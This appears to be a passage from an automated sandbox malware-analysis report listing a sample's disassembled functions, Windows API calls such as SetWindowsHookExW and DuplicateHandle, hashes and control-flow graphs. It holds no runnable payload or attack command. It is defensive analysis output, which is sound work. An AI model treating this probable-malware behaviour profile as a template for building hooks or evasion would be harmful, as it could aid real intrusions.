                                                                      • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                      • Instruction ID: d1e11866c06308db2688671cfe2e39cf8e5f3b64411c1caee3e249c785e2e979
                                                                      • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                      • Instruction Fuzzy Hash: BDD05EB34109209AC3126B08DC00D9F77BCEF11301746486AF440A6161D7786C8186AD
                                                                      Function 703D10E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 703D116A
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D11C7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D11D9
                                                                      • GlobalFree.KERNEL32(?), ref: 703D1203
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: de836c488b918c3f4c84ce14903bbf078a220f202f4c70e9a45e18cbdfc6d66b
                                                                      • Instruction ID: ced68df7799f78560342c5778d33f9f4460dc23e5f6f4ae7fa7c864e338a6cce
                                                                      • Opcode Fuzzy Hash: de836c488b918c3f4c84ce14903bbf078a220f202f4c70e9a45e18cbdfc6d66b
                                                                      • Instruction Fuzzy Hash: 3B318EB3500205BFE3008F75ED46A2EB7FDEB45310B21456AFA46D7324E779E9018B21
                                                                      Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                      • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D2B
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                      Execution Graph

                                                                      Execution Coverage:11.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:90
                                                                      Total number of Limit Nodes:8
                                                                      execution_graph 29904 15b1c0 29905 15b206 GetCurrentProcess 29904->29905 29907 15b251 29905->29907 29908 15b258 GetCurrentThread 29905->29908 29907->29908 29909 15b295 GetCurrentProcess 29908->29909 29910 15b28e 29908->29910 29911 15b2cb 29909->29911 29910->29909 29912 15b2f3 GetCurrentThreadId 29911->29912 29913 15b324 29912->29913 29920 15ba20 29921 15ba4e 29920->29921 29924 15b004 29921->29924 29923 15ba6e 29923->29923 29925 15b00f 29924->29925 29926 15c5ef 29925->29926 29929 3789be90 29925->29929 29934 3789bea0 29925->29934 29926->29923 29931 3789bea2 29929->29931 29930 3789bf52 29930->29926 29931->29930 29932 3789adb0 PeekMessageW 29931->29932 29933 3789c368 WaitMessage 29931->29933 29932->29931 29933->29931 29937 3789bf05 29934->29937 29935 3789adb0 PeekMessageW 29935->29937 29936 3789c368 WaitMessage 29936->29937 29937->29935 29937->29936 29938 3789bf52 29937->29938 29938->29926 29939 ad0fc 29940 ad114 29939->29940 29941 ad16e 29940->29941 29947 37896ad8 29940->29947 29951 37896b70 29940->29951 29956 37893a5c 29940->29956 29965 37897d58 29940->29965 29974 37896ae8 29940->29974 29948 37896ae8 29947->29948 29949 37893a5c CallWindowProcW 29948->29949 29950 37896b2f 29949->29950 29950->29941 29952 37896afc 29951->29952 29953 37896b77 29951->29953 29954 37893a5c CallWindowProcW 29952->29954 29953->29941 29955 37896b2f 29954->29955 29955->29941 29957 37893a67 29956->29957 29958 37897dc9 29957->29958 29960 37897db9 29957->29960 29961 37897dc7 29958->29961 29994 378979bc 29958->29994 29978 37897fbc 29960->29978 29984 37897ef0 29960->29984 29989 37897ee0 29960->29989 29968 37897d68 29965->29968 29966 37897dc9 29967 378979bc CallWindowProcW 29966->29967 29970 37897dc7 29966->29970 29967->29970 29968->29966 29969 37897db9 29968->29969 29971 37897fbc CallWindowProcW 29969->29971 29972 37897ee0 CallWindowProcW 29969->29972 29973 37897ef0 CallWindowProcW 29969->29973 29971->29970 29972->29970 29973->29970 29975 37896b0e 29974->29975 29976 37893a5c CallWindowProcW 29975->29976 29977 37896b2f 29976->29977 29977->29941 29979 37897f7a 29978->29979 29980 37897fca 29978->29980 29998 37897f98 29979->29998 30002 37897fa8 29979->30002 29981 37897f90 29981->29961 29986 37897f04 29984->29986 29985 37897f90 29985->29961 29987 37897f98 CallWindowProcW 29986->29987 29988 37897fa8 CallWindowProcW 29986->29988 29987->29985 29988->29985 29990 37897eee 29989->29990 29992 37897f98 CallWindowProcW 29990->29992 29993 37897fa8 CallWindowProcW 29990->29993 29991 37897f90 29991->29961 29992->29991 29993->29991 29995 378979c7 29994->29995 29996 3789965a CallWindowProcW 29995->29996 29997 37899609 29995->29997 29996->29997 29997->29961 29999 37897fa8 29998->29999 30000 37897fb9 29999->30000 30005 37899380 29999->30005 30000->29981 30003 37897fb9 30002->30003 30004 37899380 CallWindowProcW 30002->30004 30003->29981 30004->30003 30006 378979bc CallWindowProcW 30005->30006 30007 3789939a 30006->30007 30007->30000 30008 37896930 30009 37896998 CreateWindowExW 30008->30009 30011 37896a54 30009->30011 29914 15b408 DuplicateHandle 29915 15b49e 29914->29915 29916 156308 29917 15634c SetWindowsHookExW 29916->29917 29919 156392 29917->29919

                                                                      Executed Functions

                                                                      Function 36912BA0 Relevance: 6.8, Strings: 5, Instructions: 511COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P$0P$0P$0P$0P
                                                                      • API String ID: 0-2254592918
                                                                      • Opcode ID: 1d0a54cc636c6195436a9537f304fdb06e935bd667188b6cc850be7c6bf16be3
                                                                      • Instruction ID: ad42171f7c06ff38ee411ed48089d7944909ac1da6f66f01fc27c7b8e1eda0ea
                                                                      • Opcode Fuzzy Hash: 1d0a54cc636c6195436a9537f304fdb06e935bd667188b6cc850be7c6bf16be3
                                                                      • Instruction Fuzzy Hash: EF126D74B002189FEB14DF69C854BAEBBF6FF89300F248569E455AB391DB349D41CB90
                                                                      Function 36914A90 Relevance: 3.0, Strings: 2, Instructions: 467COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1039 36914a90-36914aa3 1040 36914be2-36914be9 1039->1040 1041 36914aa9-36914ab2 1039->1041 1042 36914ab8-36914abc 1041->1042 1043 36914bec 1041->1043 1044 36914ad6-36914add 1042->1044 1045 36914abe 1042->1045 1047 36914bf1-36914c14 1043->1047 1044->1040 1046 36914ae3-36914af0 1044->1046 1048 36914ac1-36914acc 1045->1048 1046->1040 1052 36914af6-36914b09 1046->1052 1053 36914c16-36914c18 1047->1053 1054 36914c1d-36914c2d 1047->1054 1048->1043 1049 36914ad2-36914ad4 1048->1049 1049->1044 1049->1048 1055 36914b0b 1052->1055 1056 36914b0e-36914b16 1052->1056 1057 36915010-36915016 1053->1057 1063 36914c33-36914c41 1054->1063 1064 3691501c-369150a3 1054->1064 1055->1056 1058 36914b83-36914b85 1056->1058 1059 36914b18-36914b1e 1056->1059 1058->1040 1061 36914b87-36914b8d 1058->1061 1059->1058 1062 36914b20-36914b26 1059->1062 1061->1040 1065 36914b8f-36914b99 1061->1065 1062->1047 1066 36914b2c-36914b44 1062->1066 1063->1064 1070 36914c47 1063->1070 1065->1047 1068 36914b9b-36914bb3 1065->1068 1120 36914b71-36914b74 1066->1120 1121 36914b46-36914b4c 1066->1121 1154 36914bb5-36914bbb 1068->1154 1155 36914bd8-36914bdb 1068->1155 1070->1064 1072 36914dd3-36914de3 1070->1072 1073 36914ef3-36914ef9 1070->1073 1074 36914f95-36914fa5 1070->1074 1075 36914e94-36914ea4 1070->1075 1076 36914d96-36914da6 1070->1076 1077 36914d58-36914d68 1070->1077 1078 36914f3b-36914f4b 1070->1078 1079 36914d1a-36914d2a 1070->1079 1080 36914cdc-36914cec 1070->1080 1081 36914c9e-36914cae 1070->1081 1082 36914e26-36914e36 1070->1082 1083 36914fe6-36914fec 1070->1083 1084 36914c4e-36914c5e 1070->1084 1089 36914de5-36914deb 1072->1089 1090 36914e0c-36914e1b 1072->1090 1093 36914efb 1073->1093 1094 36914efd 1073->1094 1087 36914fa7-36914fad 1074->1087 1088 36914fcd-36914fe4 1074->1088 1112 36914ed4-36914ee0 1075->1112 1113 36914ea6-36914eac 1075->1113 1108 36914dc4-36914dce 1076->1108 1109 36914da8-36914dae 1076->1109 1102 36914d87-36914d91 1077->1102 1103 36914d6a-36914d70 1077->1103 1106 36914f76-36914f93 1078->1106 1107 36914f4d-36914f53 1078->1107 1095 36914d49-36914d53 1079->1095 1096 36914d2c-36914d32 1079->1096 1091 36914d0b-36914d15 1080->1091 1092 36914cee-36914cf4 1080->1092 1110 36914cb0-36914cb6 1081->1110 1111 36914ccd-36914cd7 1081->1111 1098 36914e38-36914e3e 1082->1098 1099 36914e6e-36914e7a 1082->1099 1100 36914ff0 1083->1100 1101 36914fee 1083->1101 1104 36914c60-36914c66 1084->1104 1105 36914c85-36914c99 1084->1105 1129 36914fbb-36914fcb 1087->1129 1130 36914faf-36914fb1 1087->1130 1088->1057 1131 36914df9-36914e01 1089->1131 1132 36914ded-36914def 1089->1132 1144 36915017 1090->1144 1174 36914e21 1090->1174 1091->1057 1115 36914d02-36914d06 1092->1115 1116 36914cf6-36914cf8 1092->1116 1117 36914eff-36914f01 1093->1117 1094->1117 1095->1057 1118 36914d40-36914d44 1096->1118 1119 36914d34-36914d36 1096->1119 1133 36914e40-36914e42 1098->1133 1134 36914e4c-36914e51 1098->1134 1177 36914e86-36914e89 1099->1177 1178 36914e7c-36914e7e 1099->1178 1135 36914ff2-36914ff6 1100->1135 1101->1135 1102->1057 1122 36914d72-36914d74 1103->1122 1123 36914d7e-36914d82 1103->1123 1136 36914c74-36914c80 1104->1136 1137 36914c68-36914c6a 1104->1137 1105->1057 1106->1057 1124 36914f61-36914f71 1107->1124 1125 36914f55-36914f57 1107->1125 1108->1057 1126 36914db0-36914db2 1109->1126 1127 36914dbc-36914dbf 1109->1127 1138 36914cc4-36914cc8 1110->1138 1139 36914cb8-36914cba 1110->1139 1111->1057 1112->1144 1168 36914ee6-36914ee8 1112->1168 1140 36914eba-36914ebf 1113->1140 1141 36914eae-36914eb0 1113->1141 1115->1057 1116->1115 1147 36914f03-36914f0d 1117->1147 1148 36914f12-36914f36 1117->1148 1118->1057 1119->1118 1120->1043 1151 36914b76-36914b79 1120->1151 1121->1047 1149 36914b52-36914b66 1121->1149 1122->1123 1123->1057 1124->1057 1125->1124 1126->1127 1127->1057 1129->1057 1130->1129 1131->1144 1157 36914e07 1131->1157 1132->1131 1133->1134 1162 36914e53-36914e57 1134->1162 1163 36914e5f-36914e63 1134->1163 1160 36914ff8-36914ffd 1135->1160 1161 36914fff-36915009 1135->1161 1136->1057 1137->1136 1138->1057 1139->1138 1143 36914ec5-36914ec9 1140->1143 1140->1144 1141->1140 1143->1144 1167 36914ecf 1143->1167 1144->1064 1147->1057 1148->1057 1149->1047 1190 36914b6c 1149->1190 1151->1043 1169 36914b7b-36914b81 1151->1169 1154->1047 1171 36914bbd-36914bd1 1154->1171 1155->1043 1172 36914bdd-36914be0 1155->1172 1157->1057 1160->1057 1161->1057 1162->1144 1175 36914e5d 1162->1175 1163->1144 1176 36914e69 1163->1176 1167->1057 1168->1144 1179 36914eee 1168->1179 1169->1058 1169->1059 1171->1047 1193 36914bd3 1171->1193 1172->1040 1172->1065 1174->1057 1175->1176 1176->1057 1177->1144 1188 36914e8f 1177->1188 1178->1144 1187 36914e84 1178->1187 1179->1057 1187->1188 1188->1057 1190->1120 1193->1155
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P$0P
                                                                      • API String ID: 0-576979913
                                                                      • Opcode ID: b688d2ca0960958f9a0bd8baddf1ac0f38c9885fe5e7db34d4892f6fab5ecd36
                                                                      • Instruction ID: 2b8aecf047a43c6c7ed7f0c71883314fa79bc549ee16666bcd42cdeeb2ef0600
                                                                      • Opcode Fuzzy Hash: b688d2ca0960958f9a0bd8baddf1ac0f38c9885fe5e7db34d4892f6fab5ecd36
                                                                      • Instruction Fuzzy Hash: 13F1D274B00319CFEB248F66885472E77A6BB85B45F758829D8869B391CB34DC41CBE2
                                                                      Function 3789BEA0 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1582 3789bea0-3789bf03 1583 3789bf32-3789bf50 1582->1583 1584 3789bf05-3789bf2f 1582->1584 1589 3789bf59-3789bf90 1583->1589 1590 3789bf52-3789bf54 1583->1590 1584->1583 1594 3789c3c1 1589->1594 1595 3789bf96-3789bfaa 1589->1595 1592 3789c412-3789c427 1590->1592 1598 3789c3c6-3789c3dc 1594->1598 1596 3789bfd9-3789bff8 1595->1596 1597 3789bfac-3789bfd6 1595->1597 1604 3789bffa-3789c000 1596->1604 1605 3789c010-3789c012 1596->1605 1597->1596 1598->1592 1606 3789c002 1604->1606 1607 3789c004-3789c006 1604->1607 1608 3789c031-3789c03a 1605->1608 1609 3789c014-3789c02c 1605->1609 1606->1605 1607->1605 1611 3789c042-3789c049 1608->1611 1609->1598 1612 3789c04b-3789c051 1611->1612 1613 3789c053-3789c05a 1611->1613 1614 3789c067-3789c07d call 3789adb0 1612->1614 1615 3789c05c-3789c062 1613->1615 1616 3789c064 1613->1616 1618 3789c082-3789c084 1614->1618 1615->1614 1616->1614 1619 3789c1d9-3789c1dd 1618->1619 1620 3789c08a-3789c091 1618->1620 1622 3789c3ac-3789c3bf 1619->1622 1623 3789c1e3-3789c1e7 1619->1623 1620->1594 1621 3789c097-3789c0d4 1620->1621 1631 3789c0da-3789c0df 1621->1631 1632 3789c3a2-3789c3a6 1621->1632 1622->1598 1624 3789c1e9-3789c1fc 1623->1624 1625 3789c201-3789c20a 1623->1625 1624->1598 1627 3789c239-3789c240 1625->1627 1628 3789c20c-3789c236 1625->1628 1629 3789c2df-3789c2f4 1627->1629 1630 3789c246-3789c24d 1627->1630 1628->1627 1629->1632 1646 3789c2fa-3789c2fc 1629->1646 1633 3789c27c-3789c29e 1630->1633 1634 3789c24f-3789c279 1630->1634 1635 3789c111-3789c126 call 3789add4 1631->1635 1636 3789c0e1-3789c0ef call 3789adbc 1631->1636 1632->1611 1632->1622 1633->1629 1669 3789c2a0-3789c2aa 1633->1669 1634->1633 1644 3789c12b-3789c12f 1635->1644 1636->1635 1649 3789c0f1-3789c10f call 3789adc8 1636->1649 1650 3789c131-3789c143 call 3789ade0 1644->1650 1651 3789c1a0-3789c1ad 1644->1651 1647 3789c349-3789c366 call 3789adb0 1646->1647 1648 3789c2fe-3789c337 1646->1648 1647->1632 1666 3789c368-3789c394 WaitMessage 1647->1666 1663 3789c339-3789c33f 1648->1663 1664 3789c340-3789c347 1648->1664 1649->1644 1674 3789c183-3789c19b 1650->1674 1675 3789c145-3789c175 1650->1675 1651->1632 1667 3789c1b3-3789c1bd call 3789adf0 1651->1667 1663->1664 1664->1632 1671 3789c39b 1666->1671 1672 3789c396 1666->1672 1679 3789c1cc-3789c1d4 call 3789ae08 1667->1679 1680 3789c1bf-3789c1c7 call 3789adfc 1667->1680 1682 3789c2ac-3789c2b2 1669->1682 1683 3789c2c2-3789c2dd 1669->1683 1671->1632 1672->1671 1674->1598 1690 3789c17c 1675->1690 1691 3789c177 1675->1691 1679->1632 1680->1632 1687 3789c2b4 1682->1687 1688 3789c2b6-3789c2b8 1682->1688 1683->1629 1683->1669 1687->1683 1688->1683 1690->1674 1691->1690
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2615914797.0000000037890000.00000040.00000800.00020000.00000000.sdmp, Offset: 37890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_37890000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e8b6d282258f25b14f2e787328390f400968d86555747be77b7b85529fdc066
                                                                      • Instruction ID: 66c4d767942a4cad80a8dd9e02222ea0fe6e17b883d7141d4e29680a24506e59
                                                                      • Opcode Fuzzy Hash: 4e8b6d282258f25b14f2e787328390f400968d86555747be77b7b85529fdc066
                                                                      • Instruction Fuzzy Hash: E1F18D74A00308CFEB04CFA9C944BDDBBF1BF9A314F548169E409AB261DB75A945CF81
                                                                      Function 369131C8 Relevance: .5, Instructions: 466COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 45af1c5d6ff71f6d1106b11f862249f46b835681ab594cb833cc725752ec5067
                                                                      • Instruction ID: 5e11b69436310de5c77ffb9f7ee79301df2f3fb1c7b71f82a0ab6f17e62ec10e
                                                                      • Opcode Fuzzy Hash: 45af1c5d6ff71f6d1106b11f862249f46b835681ab594cb833cc725752ec5067
                                                                      • Instruction Fuzzy Hash: E5123A74A00219DFEB05CFA9C884A9DBBF6BF49344F75806AE815AB361DB34DC41CB91
                                                                      Function 36912100 Relevance: 6.7, Strings: 5, Instructions: 445COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 248 36912100-36912117 249 36912133-36912141 248->249 250 36912119-36912131 248->250 254 36912148-3691214d 249->254 250->254 392 3691214f call 36911bd1 254->392 393 3691214f call 36912100 254->393 394 3691214f call 36911b78 254->394 255 36912155-3691215b 256 369123e1-36912406 255->256 257 36912161-3691216f 255->257 262 36912415-36912426 256->262 263 36912408-3691240e 256->263 260 36912171-36912178 257->260 261 369121c7-369121d0 257->261 266 369122d1-369122fd 260->266 267 3691217e-36912183 260->267 264 36912304-36912330 261->264 265 369121d6-369121da 261->265 273 369124b9-369124bb 262->273 274 3691242c-36912430 262->274 263->262 316 36912337-369123a1 264->316 269 369121eb-36912210 call 36912ba0 265->269 270 369121dc-369121e5 265->270 266->264 271 36912185-3691218b 267->271 272 3691219b-369121a9 267->272 285 36912212-3691221d 269->285 286 3691222b-3691222f 269->286 270->264 270->269 276 3691218d 271->276 277 3691218f-36912199 271->277 289 369121b2-369121c2 272->289 290 369121ab-369121ad 272->290 384 369124bd call 36911bd1 273->384 385 369124bd call 36912100 273->385 386 369124bd call 369125a8 273->386 387 369124bd call 36911b78 273->387 279 36912440-3691244d 274->279 280 36912432-3691243e 274->280 276->272 277->272 302 3691244f-36912458 279->302 280->302 284 369124c3-369124c9 292 369124d5-369124dc 284->292 293 369124cb-369124d1 284->293 389 36912220 call 36914535 285->389 390 36912220 call 36914478 285->390 296 36912235-36912239 286->296 297 369123a8-369123da 286->297 291 369122c7-369122ce 289->291 290->291 300 369124d3 293->300 301 36912537-36912596 293->301 296->297 305 3691223f-3691224a 296->305 297->256 300->292 331 3691259d-369125ce 301->331 314 36912485-36912489 302->314 315 3691245a-36912469 302->315 303 36912226 303->291 305->297 312 36912250-3691227d 305->312 312->297 329 36912283-3691229f 312->329 317 36912495-36912499 314->317 318 3691248b-36912491 314->318 326 36912479-36912483 315->326 327 3691246b-36912472 315->327 316->297 317->292 324 3691249b-3691249f 317->324 322 36912493 318->322 323 369124df-36912530 318->323 322->292 323->301 330 369124a5-369124b7 324->330 324->331 326->314 327->326 329->316 340 369122a5-369122bf 329->340 330->292 344 369125d0-369125dd 331->344 345 369125f3-369125f8 331->345 340->297 354 369122c5 340->354 355 369125ef-369125f1 344->355 356 369125df-369125ed 344->356 352 36912600 345->352 357 36912602-3691260b 352->357 354->291 355->357 356->357 365 36912633-36912635 call 36912688 357->365 366 3691260d-3691261b 357->366 369 3691263b-3691263f 365->369 375 36912628-36912631 366->375 376 3691261d-36912621 366->376 373 36912641-36912656 369->373 374 36912658-3691265c 369->374 378 3691267a-36912680 373->378 374->378 379 3691265e-36912673 374->379 375->365 376->375 379->378 384->284 385->284 386->284 387->284 389->303 390->303 392->255 393->255 394->255
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2611652044.0000000036910000.00000040.00000800.00020000.00000000.sdmp, Offset: 36910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_36910000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0P$0P$0P$0P$0P
                                                                      • API String ID: 0-2254592918
                                                                      • Opcode ID: 49144c91d8714f772bc1e971b989b12fd350b6ed5573aeed9fb939d5979fc40a
                                                                      • Instruction ID: c598b2967640850fbc20a4666935d32a94e0c760e6aec92c938d71e9e22a4355
                                                                      • Opcode Fuzzy Hash: 49144c91d8714f772bc1e971b989b12fd350b6ed5573aeed9fb939d5979fc40a
                                                                      • Instruction Fuzzy Hash: 34F1E034B002189FEB05AF64C854B6E7BA6BB89391F348429E506DF391CF74DD82CB95
                                                                      Function 0015B1BF Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 395 15b1bf-15b24f GetCurrentProcess 399 15b251-15b257 395->399 400 15b258-15b28c GetCurrentThread 395->400 399->400 401 15b295-15b2c9 GetCurrentProcess 400->401 402 15b28e-15b294 400->402 404 15b2d2-15b2ed call 15b39f 401->404 405 15b2cb-15b2d1 401->405 402->401 408 15b2f3-15b322 GetCurrentThreadId 404->408 405->404 409 15b324-15b32a 408->409 410 15b32b-15b38d 408->410 409->410
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0015B23E
                                                                      • GetCurrentThread.KERNEL32 ref: 0015B27B
                                                                      • GetCurrentProcess.KERNEL32 ref: 0015B2B8
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0015B311
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 0f383d1b7e29255de871d0ce60fa6bb0081dbb1abb8df0c153deed28f0e8cfc5
                                                                      • Instruction ID: c437db99b2476e2c591c59dba3c436b6fd3f1a80d3bfa917c8e512e891e31721
                                                                      • Opcode Fuzzy Hash: 0f383d1b7e29255de871d0ce60fa6bb0081dbb1abb8df0c153deed28f0e8cfc5
                                                                      • Instruction Fuzzy Hash: BA5154B0904709CFDB14CFAAD588BEEBBF1AF89300F248419E419BB260D7746945CF66
                                                                      Function 0015B1C0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 417 15b1c0-15b24f GetCurrentProcess 421 15b251-15b257 417->421 422 15b258-15b28c GetCurrentThread 417->422 421->422 423 15b295-15b2c9 GetCurrentProcess 422->423 424 15b28e-15b294 422->424 426 15b2d2-15b2ed call 15b39f 423->426 427 15b2cb-15b2d1 423->427 424->423 430 15b2f3-15b322 GetCurrentThreadId 426->430 427->426 431 15b324-15b32a 430->431 432 15b32b-15b38d 430->432 431->432
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32 ref: 0015B23E
                                                                      • GetCurrentThread.KERNEL32 ref: 0015B27B
                                                                      • GetCurrentProcess.KERNEL32 ref: 0015B2B8
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0015B311
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585511259.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_150000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Current$ProcessThread
                                                                      • String ID:
                                                                      • API String ID: 2063062207-0
                                                                      • Opcode ID: 57907530438599f7fe2db21bc2a92a187d4bc62c43dea50bd67bb2d7942eb1e8
                                                                      • Instruction ID: c437db99b2476e2c591c59dba3c436b6fd3f1a80d3bfa917c8e512e891e31721
                                                                      • Opcode Fuzzy Hash: 57907530438599f7fe2db21bc2a92a187d4bc62c43dea50bd67bb2d7942eb1e8
                                                                      • Instruction Fuzzy Hash: BA5154B0904709CFDB14CFAAD588BEEBBF1AF89300F248419E419BB260D7746945CF66
                                                                      Function 36911B78 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
